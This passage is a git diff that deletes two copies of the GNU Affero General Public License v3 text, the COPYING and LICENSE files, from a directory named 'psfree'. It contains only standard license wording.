diff --git a/psfree/COPYING b/psfree/COPYING deleted file mode 100644 index be3f7b2..0000000 --- a/psfree/COPYING +++ /dev/null @@ -1,661 +0,0 @@ - GNU AFFERO GENERAL PUBLIC LICENSE - Version 3, 19 November 2007 - - Copyright (C) 2007 Free Software Foundation, Inc. - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The GNU Affero General Public License is a free, copyleft license for -software and other kinds of works, specifically designed to ensure -cooperation with the community in the case of network server software. - - The licenses for most software and other practical works are designed -to take away your freedom to share and change the works. By contrast, -our General Public Licenses are intended to guarantee your freedom to -share and change all versions of a program--to make sure it remains free -software for all its users. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -them if you wish), that you receive source code or can get it if you -want it, that you can change the software or use pieces of it in new -free programs, and that you know you can do these things. - - Developers that use our General Public Licenses protect your rights -with two steps: (1) assert copyright on the software, and (2) offer -you this License which gives you legal permission to copy, distribute -and/or modify the software. - - A secondary benefit of defending all users' freedom is that -improvements made in alternate versions of the program, if they -receive widespread use, become available for other developers to -incorporate. Many developers of free software are heartened and -encouraged by the resulting cooperation. However, in the case of -software used on network servers, this result may fail to come about. -The GNU General Public License permits making a modified version and -letting the public access it on a server without ever releasing its -source code to the public. - - The GNU Affero General Public License is designed specifically to -ensure that, in such cases, the modified source code becomes available -to the community. It requires the operator of a network server to -provide the source code of the modified version running there to the -users of that server. Therefore, public use of a modified version, on -a publicly accessible server, gives the public access to the source -code of the modified version. - - An older license, called the Affero General Public License and -published by Affero, was designed to accomplish similar goals. This is -a different license, not a version of the Affero GPL, but Affero has -released a new version of the Affero GPL which permits relicensing under -this license. - - The precise terms and conditions for copying, distribution and -modification follow. - - TERMS AND CONDITIONS - - 0. Definitions. - - "This License" refers to version 3 of the GNU Affero General Public License. - - "Copyright" also means copyright-like laws that apply to other kinds of -works, such as semiconductor masks. - - "The Program" refers to any copyrightable work licensed under this -License. Each licensee is addressed as "you". "Licensees" and -"recipients" may be individuals or organizations. - - To "modify" a work means to copy from or adapt all or part of the work -in a fashion requiring copyright permission, other than the making of an -exact copy. The resulting work is called a "modified version" of the -earlier work or a work "based on" the earlier work. - - A "covered work" means either the unmodified Program or a work based -on the Program. - - To "propagate" a work means to do anything with it that, without -permission, would make you directly or secondarily liable for -infringement under applicable copyright law, except executing it on a -computer or modifying a private copy. Propagation includes copying, -distribution (with or without modification), making available to the -public, and in some countries other activities as well. - - To "convey" a work means any kind of propagation that enables other -parties to make or receive copies. Mere interaction with a user through -a computer network, with no transfer of a copy, is not conveying. - - An interactive user interface displays "Appropriate Legal Notices" -to the extent that it includes a convenient and prominently visible -feature that (1) displays an appropriate copyright notice, and (2) -tells the user that there is no warranty for the work (except to the -extent that warranties are provided), that licensees may convey the -work under this License, and how to view a copy of this License. If -the interface presents a list of user commands or options, such as a -menu, a prominent item in the list meets this criterion. - - 1. Source Code. - - The "source code" for a work means the preferred form of the work -for making modifications to it. "Object code" means any non-source -form of a work. - - A "Standard Interface" means an interface that either is an official -standard defined by a recognized standards body, or, in the case of -interfaces specified for a particular programming language, one that -is widely used among developers working in that language. - - The "System Libraries" of an executable work include anything, other -than the work as a whole, that (a) is included in the normal form of -packaging a Major Component, but which is not part of that Major -Component, and (b) serves only to enable use of the work with that -Major Component, or to implement a Standard Interface for which an -implementation is available to the public in source code form. A -"Major Component", in this context, means a major essential component -(kernel, window system, and so on) of the specific operating system -(if any) on which the executable work runs, or a compiler used to -produce the work, or an object code interpreter used to run it. - - The "Corresponding Source" for a work in object code form means all -the source code needed to generate, install, and (for an executable -work) run the object code and to modify the work, including scripts to -control those activities. However, it does not include the work's -System Libraries, or general-purpose tools or generally available free -programs which are used unmodified in performing those activities but -which are not part of the work. For example, Corresponding Source -includes interface definition files associated with source files for -the work, and the source code for shared libraries and dynamically -linked subprograms that the work is specifically designed to require, -such as by intimate data communication or control flow between those -subprograms and other parts of the work. - - The Corresponding Source need not include anything that users -can regenerate automatically from other parts of the Corresponding -Source. - - The Corresponding Source for a work in source code form is that -same work. - - 2. Basic Permissions. - - All rights granted under this License are granted for the term of -copyright on the Program, and are irrevocable provided the stated -conditions are met. This License explicitly affirms your unlimited -permission to run the unmodified Program. The output from running a -covered work is covered by this License only if the output, given its -content, constitutes a covered work. This License acknowledges your -rights of fair use or other equivalent, as provided by copyright law. - - You may make, run and propagate covered works that you do not -convey, without conditions so long as your license otherwise remains -in force. You may convey covered works to others for the sole purpose -of having them make modifications exclusively for you, or provide you -with facilities for running those works, provided that you comply with -the terms of this License in conveying all material for which you do -not control copyright. Those thus making or running the covered works -for you must do so exclusively on your behalf, under your direction -and control, on terms that prohibit them from making any copies of -your copyrighted material outside their relationship with you. - - Conveying under any other circumstances is permitted solely under -the conditions stated below. Sublicensing is not allowed; section 10 -makes it unnecessary. - - 3. Protecting Users' Legal Rights From Anti-Circumvention Law. - - No covered work shall be deemed part of an effective technological -measure under any applicable law fulfilling obligations under article -11 of the WIPO copyright treaty adopted on 20 December 1996, or -similar laws prohibiting or restricting circumvention of such -measures. - - When you convey a covered work, you waive any legal power to forbid -circumvention of technological measures to the extent such circumvention -is effected by exercising rights under this License with respect to -the covered work, and you disclaim any intention to limit operation or -modification of the work as a means of enforcing, against the work's -users, your or third parties' legal rights to forbid circumvention of -technological measures. - - 4. Conveying Verbatim Copies. - - You may convey verbatim copies of the Program's source code as you -receive it, in any medium, provided that you conspicuously and -appropriately publish on each copy an appropriate copyright notice; -keep intact all notices stating that this License and any -non-permissive terms added in accord with section 7 apply to the code; -keep intact all notices of the absence of any warranty; and give all -recipients a copy of this License along with the Program. - - You may charge any price or no price for each copy that you convey, -and you may offer support or warranty protection for a fee. - - 5. Conveying Modified Source Versions. - - You may convey a work based on the Program, or the modifications to -produce it from the Program, in the form of source code under the -terms of section 4, provided that you also meet all of these conditions: - - a) The work must carry prominent notices stating that you modified - it, and giving a relevant date. - - b) The work must carry prominent notices stating that it is - released under this License and any conditions added under section - 7. This requirement modifies the requirement in section 4 to - "keep intact all notices". - - c) You must license the entire work, as a whole, under this - License to anyone who comes into possession of a copy. This - License will therefore apply, along with any applicable section 7 - additional terms, to the whole of the work, and all its parts, - regardless of how they are packaged. This License gives no - permission to license the work in any other way, but it does not - invalidate such permission if you have separately received it. - - d) If the work has interactive user interfaces, each must display - Appropriate Legal Notices; however, if the Program has interactive - interfaces that do not display Appropriate Legal Notices, your - work need not make them do so. - - A compilation of a covered work with other separate and independent -works, which are not by their nature extensions of the covered work, -and which are not combined with it such as to form a larger program, -in or on a volume of a storage or distribution medium, is called an -"aggregate" if the compilation and its resulting copyright are not -used to limit the access or legal rights of the compilation's users -beyond what the individual works permit. Inclusion of a covered work -in an aggregate does not cause this License to apply to the other -parts of the aggregate. - - 6. Conveying Non-Source Forms. - - You may convey a covered work in object code form under the terms -of sections 4 and 5, provided that you also convey the -machine-readable Corresponding Source under the terms of this License, -in one of these ways: - - a) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by the - Corresponding Source fixed on a durable physical medium - customarily used for software interchange. - - b) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by a - written offer, valid for at least three years and valid for as - long as you offer spare parts or customer support for that product - model, to give anyone who possesses the object code either (1) a - copy of the Corresponding Source for all the software in the - product that is covered by this License, on a durable physical - medium customarily used for software interchange, for a price no - more than your reasonable cost of physically performing this - conveying of source, or (2) access to copy the - Corresponding Source from a network server at no charge. - - c) Convey individual copies of the object code with a copy of the - written offer to provide the Corresponding Source. This - alternative is allowed only occasionally and noncommercially, and - only if you received the object code with such an offer, in accord - with subsection 6b. - - d) Convey the object code by offering access from a designated - place (gratis or for a charge), and offer equivalent access to the - Corresponding Source in the same way through the same place at no - further charge. You need not require recipients to copy the - Corresponding Source along with the object code. If the place to - copy the object code is a network server, the Corresponding Source - may be on a different server (operated by you or a third party) - that supports equivalent copying facilities, provided you maintain - clear directions next to the object code saying where to find the - Corresponding Source. Regardless of what server hosts the - Corresponding Source, you remain obligated to ensure that it is - available for as long as needed to satisfy these requirements. - - e) Convey the object code using peer-to-peer transmission, provided - you inform other peers where the object code and Corresponding - Source of the work are being offered to the general public at no - charge under subsection 6d. - - A separable portion of the object code, whose source code is excluded -from the Corresponding Source as a System Library, need not be -included in conveying the object code work. - - A "User Product" is either (1) a "consumer product", which means any -tangible personal property which is normally used for personal, family, -or household purposes, or (2) anything designed or sold for incorporation -into a dwelling. In determining whether a product is a consumer product, -doubtful cases shall be resolved in favor of coverage. For a particular -product received by a particular user, "normally used" refers to a -typical or common use of that class of product, regardless of the status -of the particular user or of the way in which the particular user -actually uses, or expects or is expected to use, the product. A product -is a consumer product regardless of whether the product has substantial -commercial, industrial or non-consumer uses, unless such uses represent -the only significant mode of use of the product. - - "Installation Information" for a User Product means any methods, -procedures, authorization keys, or other information required to install -and execute modified versions of a covered work in that User Product from -a modified version of its Corresponding Source. The information must -suffice to ensure that the continued functioning of the modified object -code is in no case prevented or interfered with solely because -modification has been made. - - If you convey an object code work under this section in, or with, or -specifically for use in, a User Product, and the conveying occurs as -part of a transaction in which the right of possession and use of the -User Product is transferred to the recipient in perpetuity or for a -fixed term (regardless of how the transaction is characterized), the -Corresponding Source conveyed under this section must be accompanied -by the Installation Information. But this requirement does not apply -if neither you nor any third party retains the ability to install -modified object code on the User Product (for example, the work has -been installed in ROM). - - The requirement to provide Installation Information does not include a -requirement to continue to provide support service, warranty, or updates -for a work that has been modified or installed by the recipient, or for -the User Product in which it has been modified or installed. Access to a -network may be denied when the modification itself materially and -adversely affects the operation of the network or violates the rules and -protocols for communication across the network. - - Corresponding Source conveyed, and Installation Information provided, -in accord with this section must be in a format that is publicly -documented (and with an implementation available to the public in -source code form), and must require no special password or key for -unpacking, reading or copying. - - 7. Additional Terms. - - "Additional permissions" are terms that supplement the terms of this -License by making exceptions from one or more of its conditions. -Additional permissions that are applicable to the entire Program shall -be treated as though they were included in this License, to the extent -that they are valid under applicable law. If additional permissions -apply only to part of the Program, that part may be used separately -under those permissions, but the entire Program remains governed by -this License without regard to the additional permissions. - - When you convey a copy of a covered work, you may at your option -remove any additional permissions from that copy, or from any part of -it. (Additional permissions may be written to require their own -removal in certain cases when you modify the work.) You may place -additional permissions on material, added by you to a covered work, -for which you have or can give appropriate copyright permission. - - Notwithstanding any other provision of this License, for material you -add to a covered work, you may (if authorized by the copyright holders of -that material) supplement the terms of this License with terms: - - a) Disclaiming warranty or limiting liability differently from the - terms of sections 15 and 16 of this License; or - - b) Requiring preservation of specified reasonable legal notices or - author attributions in that material or in the Appropriate Legal - Notices displayed by works containing it; or - - c) Prohibiting misrepresentation of the origin of that material, or - requiring that modified versions of such material be marked in - reasonable ways as different from the original version; or - - d) Limiting the use for publicity purposes of names of licensors or - authors of the material; or - - e) Declining to grant rights under trademark law for use of some - trade names, trademarks, or service marks; or - - f) Requiring indemnification of licensors and authors of that - material by anyone who conveys the material (or modified versions of - it) with contractual assumptions of liability to the recipient, for - any liability that these contractual assumptions directly impose on - those licensors and authors. - - All other non-permissive additional terms are considered "further -restrictions" within the meaning of section 10. If the Program as you -received it, or any part of it, contains a notice stating that it is -governed by this License along with a term that is a further -restriction, you may remove that term. If a license document contains -a further restriction but permits relicensing or conveying under this -License, you may add to a covered work material governed by the terms -of that license document, provided that the further restriction does -not survive such relicensing or conveying. - - If you add terms to a covered work in accord with this section, you -must place, in the relevant source files, a statement of the -additional terms that apply to those files, or a notice indicating -where to find the applicable terms. - - Additional terms, permissive or non-permissive, may be stated in the -form of a separately written license, or stated as exceptions; -the above requirements apply either way. - - 8. Termination. - - You may not propagate or modify a covered work except as expressly -provided under this License. Any attempt otherwise to propagate or -modify it is void, and will automatically terminate your rights under -this License (including any patent licenses granted under the third -paragraph of section 11). - - However, if you cease all violation of this License, then your -license from a particular copyright holder is reinstated (a) -provisionally, unless and until the copyright holder explicitly and -finally terminates your license, and (b) permanently, if the copyright -holder fails to notify you of the violation by some reasonable means -prior to 60 days after the cessation. - - Moreover, your license from a particular copyright holder is -reinstated permanently if the copyright holder notifies you of the -violation by some reasonable means, this is the first time you have -received notice of violation of this License (for any work) from that -copyright holder, and you cure the violation prior to 30 days after -your receipt of the notice. - - Termination of your rights under this section does not terminate the -licenses of parties who have received copies or rights from you under -this License. If your rights have been terminated and not permanently -reinstated, you do not qualify to receive new licenses for the same -material under section 10. - - 9. Acceptance Not Required for Having Copies. - - You are not required to accept this License in order to receive or -run a copy of the Program. Ancillary propagation of a covered work -occurring solely as a consequence of using peer-to-peer transmission -to receive a copy likewise does not require acceptance. However, -nothing other than this License grants you permission to propagate or -modify any covered work. These actions infringe copyright if you do -not accept this License. Therefore, by modifying or propagating a -covered work, you indicate your acceptance of this License to do so. - - 10. Automatic Licensing of Downstream Recipients. - - Each time you convey a covered work, the recipient automatically -receives a license from the original licensors, to run, modify and -propagate that work, subject to this License. You are not responsible -for enforcing compliance by third parties with this License. - - An "entity transaction" is a transaction transferring control of an -organization, or substantially all assets of one, or subdividing an -organization, or merging organizations. If propagation of a covered -work results from an entity transaction, each party to that -transaction who receives a copy of the work also receives whatever -licenses to the work the party's predecessor in interest had or could -give under the previous paragraph, plus a right to possession of the -Corresponding Source of the work from the predecessor in interest, if -the predecessor has it or can get it with reasonable efforts. - - You may not impose any further restrictions on the exercise of the -rights granted or affirmed under this License. For example, you may -not impose a license fee, royalty, or other charge for exercise of -rights granted under this License, and you may not initiate litigation -(including a cross-claim or counterclaim in a lawsuit) alleging that -any patent claim is infringed by making, using, selling, offering for -sale, or importing the Program or any portion of it. - - 11. Patents. - - A "contributor" is a copyright holder who authorizes use under this -License of the Program or a work on which the Program is based. The -work thus licensed is called the contributor's "contributor version". - - A contributor's "essential patent claims" are all patent claims -owned or controlled by the contributor, whether already acquired or -hereafter acquired, that would be infringed by some manner, permitted -by this License, of making, using, or selling its contributor version, -but do not include claims that would be infringed only as a -consequence of further modification of the contributor version. For -purposes of this definition, "control" includes the right to grant -patent sublicenses in a manner consistent with the requirements of -this License. - - Each contributor grants you a non-exclusive, worldwide, royalty-free -patent license under the contributor's essential patent claims, to -make, use, sell, offer for sale, import and otherwise run, modify and -propagate the contents of its contributor version. - - In the following three paragraphs, a "patent license" is any express -agreement or commitment, however denominated, not to enforce a patent -(such as an express permission to practice a patent or covenant not to -sue for patent infringement). To "grant" such a patent license to a -party means to make such an agreement or commitment not to enforce a -patent against the party. - - If you convey a covered work, knowingly relying on a patent license, -and the Corresponding Source of the work is not available for anyone -to copy, free of charge and under the terms of this License, through a -publicly available network server or other readily accessible means, -then you must either (1) cause the Corresponding Source to be so -available, or (2) arrange to deprive yourself of the benefit of the -patent license for this particular work, or (3) arrange, in a manner -consistent with the requirements of this License, to extend the patent -license to downstream recipients. "Knowingly relying" means you have -actual knowledge that, but for the patent license, your conveying the -covered work in a country, or your recipient's use of the covered work -in a country, would infringe one or more identifiable patents in that -country that you have reason to believe are valid. - - If, pursuant to or in connection with a single transaction or -arrangement, you convey, or propagate by procuring conveyance of, a -covered work, and grant a patent license to some of the parties -receiving the covered work authorizing them to use, propagate, modify -or convey a specific copy of the covered work, then the patent license -you grant is automatically extended to all recipients of the covered -work and works based on it. - - A patent license is "discriminatory" if it does not include within -the scope of its coverage, prohibits the exercise of, or is -conditioned on the non-exercise of one or more of the rights that are -specifically granted under this License. You may not convey a covered -work if you are a party to an arrangement with a third party that is -in the business of distributing software, under which you make payment -to the third party based on the extent of your activity of conveying -the work, and under which the third party grants, to any of the -parties who would receive the covered work from you, a discriminatory -patent license (a) in connection with copies of the covered work -conveyed by you (or copies made from those copies), or (b) primarily -for and in connection with specific products or compilations that -contain the covered work, unless you entered into that arrangement, -or that patent license was granted, prior to 28 March 2007. - - Nothing in this License shall be construed as excluding or limiting -any implied license or other defenses to infringement that may -otherwise be available to you under applicable patent law. - - 12. No Surrender of Others' Freedom. - - If conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot convey a -covered work so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you may -not convey it at all. For example, if you agree to terms that obligate you -to collect a royalty for further conveying from those to whom you convey -the Program, the only way you could satisfy both those terms and this -License would be to refrain entirely from conveying the Program. - - 13. Remote Network Interaction; Use with the GNU General Public License. - - Notwithstanding any other provision of this License, if you modify the -Program, your modified version must prominently offer all users -interacting with it remotely through a computer network (if your version -supports such interaction) an opportunity to receive the Corresponding -Source of your version by providing access to the Corresponding Source -from a network server at no charge, through some standard or customary -means of facilitating copying of software. This Corresponding Source -shall include the Corresponding Source for any work covered by version 3 -of the GNU General Public License that is incorporated pursuant to the -following paragraph. - - Notwithstanding any other provision of this License, you have -permission to link or combine any covered work with a work licensed -under version 3 of the GNU General Public License into a single -combined work, and to convey the resulting work. The terms of this -License will continue to apply to the part which is the covered work, -but the work with which it is combined will remain governed by version -3 of the GNU General Public License. - - 14. Revised Versions of this License. - - The Free Software Foundation may publish revised and/or new versions of -the GNU Affero General Public License from time to time. Such new versions -will be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - - Each version is given a distinguishing version number. If the -Program specifies that a certain numbered version of the GNU Affero General -Public License "or any later version" applies to it, you have the -option of following the terms and conditions either of that numbered -version or of any later version published by the Free Software -Foundation. If the Program does not specify a version number of the -GNU Affero General Public License, you may choose any version ever published -by the Free Software Foundation. - - If the Program specifies that a proxy can decide which future -versions of the GNU Affero General Public License can be used, that proxy's -public statement of acceptance of a version permanently authorizes you -to choose that version for the Program. - - Later license versions may give you additional or different -permissions. However, no additional obligations are imposed on any -author or copyright holder as a result of your choosing to follow a -later version. - - 15. Disclaimer of Warranty. - - THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY -APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT -HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY -OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, -THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR -PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM -IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF -ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - - 16. Limitation of Liability. - - IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS -THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY -GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE -USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF -DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD -PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), -EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF -SUCH DAMAGES. - - 17. Interpretation of Sections 15 and 16. - - If the disclaimer of warranty and limitation of liability provided -above cannot be given local legal effect according to their terms, -reviewing courts shall apply local law that most closely approximates -an absolute waiver of all civil liability in connection with the -Program, unless a warranty or assumption of liability accompanies a -copy of the Program in return for a fee. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -state the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU Affero General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU Affero General Public License for more details. - - You should have received a copy of the GNU Affero General Public License - along with this program. If not, see . - -Also add information on how to contact you by electronic and paper mail. - - If your software can interact with users remotely through a computer -network, you should also make sure that it provides a way for users to -get its source. For example, if your program is a web application, its -interface could display a "Source" link that leads users to an archive -of the code. There are many ways you could offer source, and different -solutions will be better for different programs; see section 13 for the -specific requirements. - - You should also get your employer (if you work as a programmer) or school, -if any, to sign a "copyright disclaimer" for the program, if necessary. -For more information on this, and how to apply and follow the GNU AGPL, see -. diff --git a/psfree/LICENSE b/psfree/LICENSE deleted file mode 100644 index be3f7b2..0000000 --- a/psfree/LICENSE +++ /dev/null @@ -1,661 +0,0 @@ - GNU AFFERO GENERAL PUBLIC LICENSE - Version 3, 19 November 2007 - - Copyright (C) 2007 Free Software Foundation, Inc. - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The GNU Affero General Public License is a free, copyleft license for -software and other kinds of works, specifically designed to ensure -cooperation with the community in the case of network server software. - - The licenses for most software and other practical works are designed -to take away your freedom to share and change the works. By contrast, -our General Public Licenses are intended to guarantee your freedom to -share and change all versions of a program--to make sure it remains free -software for all its users. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -them if you wish), that you receive source code or can get it if you -want it, that you can change the software or use pieces of it in new -free programs, and that you know you can do these things. - - Developers that use our General Public Licenses protect your rights -with two steps: (1) assert copyright on the software, and (2) offer -you this License which gives you legal permission to copy, distribute -and/or modify the software. - - A secondary benefit of defending all users' freedom is that -improvements made in alternate versions of the program, if they -receive widespread use, become available for other developers to -incorporate. Many developers of free software are heartened and -encouraged by the resulting cooperation. However, in the case of -software used on network servers, this result may fail to come about. -The GNU General Public License permits making a modified version and -letting the public access it on a server without ever releasing its -source code to the public. - - The GNU Affero General Public License is designed specifically to -ensure that, in such cases, the modified source code becomes available -to the community. It requires the operator of a network server to -provide the source code of the modified version running there to the -users of that server. Therefore, public use of a modified version, on -a publicly accessible server, gives the public access to the source -code of the modified version. - - An older license, called the Affero General Public License and -published by Affero, was designed to accomplish similar goals. This is -a different license, not a version of the Affero GPL, but Affero has -released a new version of the Affero GPL which permits relicensing under -this license. - - The precise terms and conditions for copying, distribution and -modification follow. - - TERMS AND CONDITIONS - - 0. Definitions. - - "This License" refers to version 3 of the GNU Affero General Public License. - - "Copyright" also means copyright-like laws that apply to other kinds of -works, such as semiconductor masks. - - "The Program" refers to any copyrightable work licensed under this -License. Each licensee is addressed as "you". "Licensees" and -"recipients" may be individuals or organizations. - - To "modify" a work means to copy from or adapt all or part of the work -in a fashion requiring copyright permission, other than the making of an -exact copy. The resulting work is called a "modified version" of the -earlier work or a work "based on" the earlier work. - - A "covered work" means either the unmodified Program or a work based -on the Program. - - To "propagate" a work means to do anything with it that, without -permission, would make you directly or secondarily liable for -infringement under applicable copyright law, except executing it on a -computer or modifying a private copy. Propagation includes copying, -distribution (with or without modification), making available to the -public, and in some countries other activities as well. - - To "convey" a work means any kind of propagation that enables other -parties to make or receive copies. Mere interaction with a user through -a computer network, with no transfer of a copy, is not conveying. - - An interactive user interface displays "Appropriate Legal Notices" -to the extent that it includes a convenient and prominently visible -feature that (1) displays an appropriate copyright notice, and (2) -tells the user that there is no warranty for the work (except to the -extent that warranties are provided), that licensees may convey the -work under this License, and how to view a copy of this License. If -the interface presents a list of user commands or options, such as a -menu, a prominent item in the list meets this criterion. - - 1. Source Code. - - The "source code" for a work means the preferred form of the work -for making modifications to it. "Object code" means any non-source -form of a work. - - A "Standard Interface" means an interface that either is an official -standard defined by a recognized standards body, or, in the case of -interfaces specified for a particular programming language, one that -is widely used among developers working in that language. - - The "System Libraries" of an executable work include anything, other -than the work as a whole, that (a) is included in the normal form of -packaging a Major Component, but which is not part of that Major -Component, and (b) serves only to enable use of the work with that -Major Component, or to implement a Standard Interface for which an -implementation is available to the public in source code form. A -"Major Component", in this context, means a major essential component -(kernel, window system, and so on) of the specific operating system -(if any) on which the executable work runs, or a compiler used to -produce the work, or an object code interpreter used to run it. - - The "Corresponding Source" for a work in object code form means all -the source code needed to generate, install, and (for an executable -work) run the object code and to modify the work, including scripts to -control those activities. However, it does not include the work's -System Libraries, or general-purpose tools or generally available free -programs which are used unmodified in performing those activities but -which are not part of the work. For example, Corresponding Source -includes interface definition files associated with source files for -the work, and the source code for shared libraries and dynamically -linked subprograms that the work is specifically designed to require, -such as by intimate data communication or control flow between those -subprograms and other parts of the work. - - The Corresponding Source need not include anything that users -can regenerate automatically from other parts of the Corresponding -Source. - - The Corresponding Source for a work in source code form is that -same work. - - 2. Basic Permissions. - - All rights granted under this License are granted for the term of -copyright on the Program, and are irrevocable provided the stated -conditions are met. This License explicitly affirms your unlimited -permission to run the unmodified Program. The output from running a -covered work is covered by this License only if the output, given its -content, constitutes a covered work. This License acknowledges your -rights of fair use or other equivalent, as provided by copyright law. - - You may make, run and propagate covered works that you do not -convey, without conditions so long as your license otherwise remains -in force. You may convey covered works to others for the sole purpose -of having them make modifications exclusively for you, or provide you -with facilities for running those works, provided that you comply with -the terms of this License in conveying all material for which you do -not control copyright. Those thus making or running the covered works -for you must do so exclusively on your behalf, under your direction -and control, on terms that prohibit them from making any copies of -your copyrighted material outside their relationship with you. - - Conveying under any other circumstances is permitted solely under -the conditions stated below. Sublicensing is not allowed; section 10 -makes it unnecessary. - - 3. Protecting Users' Legal Rights From Anti-Circumvention Law. - - No covered work shall be deemed part of an effective technological -measure under any applicable law fulfilling obligations under article -11 of the WIPO copyright treaty adopted on 20 December 1996, or -similar laws prohibiting or restricting circumvention of such -measures. - - When you convey a covered work, you waive any legal power to forbid -circumvention of technological measures to the extent such circumvention -is effected by exercising rights under this License with respect to -the covered work, and you disclaim any intention to limit operation or -modification of the work as a means of enforcing, against the work's -users, your or third parties' legal rights to forbid circumvention of -technological measures. - - 4. Conveying Verbatim Copies. - - You may convey verbatim copies of the Program's source code as you -receive it, in any medium, provided that you conspicuously and -appropriately publish on each copy an appropriate copyright notice; -keep intact all notices stating that this License and any -non-permissive terms added in accord with section 7 apply to the code; -keep intact all notices of the absence of any warranty; and give all -recipients a copy of this License along with the Program. - - You may charge any price or no price for each copy that you convey, -and you may offer support or warranty protection for a fee. - - 5. Conveying Modified Source Versions. - - You may convey a work based on the Program, or the modifications to -produce it from the Program, in the form of source code under the -terms of section 4, provided that you also meet all of these conditions: - - a) The work must carry prominent notices stating that you modified - it, and giving a relevant date. - - b) The work must carry prominent notices stating that it is - released under this License and any conditions added under section - 7. This requirement modifies the requirement in section 4 to - "keep intact all notices". - - c) You must license the entire work, as a whole, under this - License to anyone who comes into possession of a copy. This - License will therefore apply, along with any applicable section 7 - additional terms, to the whole of the work, and all its parts, - regardless of how they are packaged. This License gives no - permission to license the work in any other way, but it does not - invalidate such permission if you have separately received it. - - d) If the work has interactive user interfaces, each must display - Appropriate Legal Notices; however, if the Program has interactive - interfaces that do not display Appropriate Legal Notices, your - work need not make them do so. - - A compilation of a covered work with other separate and independent -works, which are not by their nature extensions of the covered work, -and which are not combined with it such as to form a larger program, -in or on a volume of a storage or distribution medium, is called an -"aggregate" if the compilation and its resulting copyright are not -used to limit the access or legal rights of the compilation's users -beyond what the individual works permit. Inclusion of a covered work -in an aggregate does not cause this License to apply to the other -parts of the aggregate. - - 6. Conveying Non-Source Forms. - - You may convey a covered work in object code form under the terms -of sections 4 and 5, provided that you also convey the -machine-readable Corresponding Source under the terms of this License, -in one of these ways: - - a) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by the - Corresponding Source fixed on a durable physical medium - customarily used for software interchange. - - b) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by a - written offer, valid for at least three years and valid for as - long as you offer spare parts or customer support for that product - model, to give anyone who possesses the object code either (1) a - copy of the Corresponding Source for all the software in the - product that is covered by this License, on a durable physical - medium customarily used for software interchange, for a price no - more than your reasonable cost of physically performing this - conveying of source, or (2) access to copy the - Corresponding Source from a network server at no charge. - - c) Convey individual copies of the object code with a copy of the - written offer to provide the Corresponding Source. This - alternative is allowed only occasionally and noncommercially, and - only if you received the object code with such an offer, in accord - with subsection 6b. - - d) Convey the object code by offering access from a designated - place (gratis or for a charge), and offer equivalent access to the - Corresponding Source in the same way through the same place at no - further charge. You need not require recipients to copy the - Corresponding Source along with the object code. If the place to - copy the object code is a network server, the Corresponding Source - may be on a different server (operated by you or a third party) - that supports equivalent copying facilities, provided you maintain - clear directions next to the object code saying where to find the - Corresponding Source. Regardless of what server hosts the - Corresponding Source, you remain obligated to ensure that it is - available for as long as needed to satisfy these requirements. - - e) Convey the object code using peer-to-peer transmission, provided - you inform other peers where the object code and Corresponding - Source of the work are being offered to the general public at no - charge under subsection 6d. - - A separable portion of the object code, whose source code is excluded -from the Corresponding Source as a System Library, need not be -included in conveying the object code work. - - A "User Product" is either (1) a "consumer product", which means any -tangible personal property which is normally used for personal, family, -or household purposes, or (2) anything designed or sold for incorporation -into a dwelling. In determining whether a product is a consumer product, -doubtful cases shall be resolved in favor of coverage. For a particular -product received by a particular user, "normally used" refers to a -typical or common use of that class of product, regardless of the status -of the particular user or of the way in which the particular user -actually uses, or expects or is expected to use, the product. A product -is a consumer product regardless of whether the product has substantial -commercial, industrial or non-consumer uses, unless such uses represent -the only significant mode of use of the product. - - "Installation Information" for a User Product means any methods, -procedures, authorization keys, or other information required to install -and execute 